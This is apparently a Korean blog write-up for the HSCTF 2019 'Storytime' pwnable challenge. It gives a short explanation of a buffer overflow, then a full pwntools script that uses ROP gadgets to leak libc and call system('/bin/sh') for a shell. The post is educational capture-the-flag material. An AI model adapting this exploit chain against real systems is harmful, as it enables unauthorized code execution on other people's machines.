SDJ( 수돈재 아님 ㅎ )

HSCTF 2019 - Storytime 본문

write-up/pwnable

HSCTF 2019 - Storytime

ShinDongJun 2019. 9. 16. 22:26

64bit 바이너리에 NX만 활성화 되어있다.

 

가장먼저 main()함수에서 bof취약점이 존재한다.

 

 

그리고 bof가 일어나는 함수 climax()를 준다.

 

따라서 익스플로잇 과정은 다음과 같다.

1. ret에 read_leave_ret을 넣어 bss로 돌린다.

2. ROP를 통해 가젯들과 주소를 구한다.

3. RTL로 쉘을 딴다.

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from pwn import *
 
= process("./storytime")
 
write_plt = 0x4004a0
read_plt = 0x4004b0
 
write_got = 0x601018    # write(1, buf, byte)
read_got = 0x601020
 
read_system_offset = 728768
read_leave_ret_30 = 0x0000000000400680
climax = 0x000000000040060E
 
pop_rdi = 0x400703
pop_rsi_r15 = 0x400701
leave_ret = 0x40062c
 
bss = 0x0000000000601049 + 0x500
 
p.recv()
 
pay = ''
pay += 'a'*0x30
pay += p64(bss+0x30)
pay += p64(pop_rdi) + p64(1# stdout
pay += p64(pop_rsi_r15) + p64(read_got) + p64(0)
pay += p64(write_plt)
pay += p64(climax)
p.sendline(pay)
 
libc_read = u64(p.recv(6).ljust(8,'\x00'))
libc_system = libc_read - read_system_offset
print "libc_read : " + hex(libc_read)
print "libc_system : " + hex(libc_system)
p.recv()
 
pay = ''
pay += 'a'*0x30
pay += p64(bss)
pay += p64(pop_rdi) + p64(0)
pay += p64(pop_rsi_r15) + p64(read_got) + p64(0)
pay += p64(read_plt)
 
pay += p64(pop_rdi) 
pay += p64(read_got+8) # /bin/sh
pay += p64(read_plt)
 
pay += p64(leave_ret)
p.sendline(pay)
 
pay = ''
pay += p64(libc_system) + "/bin/sh\x00"
p.sendline(pay)
p.interactive()

'write-up > pwnable' 카테고리의 다른 글

NACTF 2019 - BufferOverflow #1  (0) 2019.09.23
NACTF 2019 - BufferOverflow #0  (0) 2019.09.23
HSCTF 2019 - Combo Chain  (0) 2019.09.16
HSCTF 2019 - Combo Chain Lite  (0) 2019.09.16
HSCTF 2019 - Return to Sender  (0) 2019.09.16
'write-up/pwnable' Related Articles more
Comments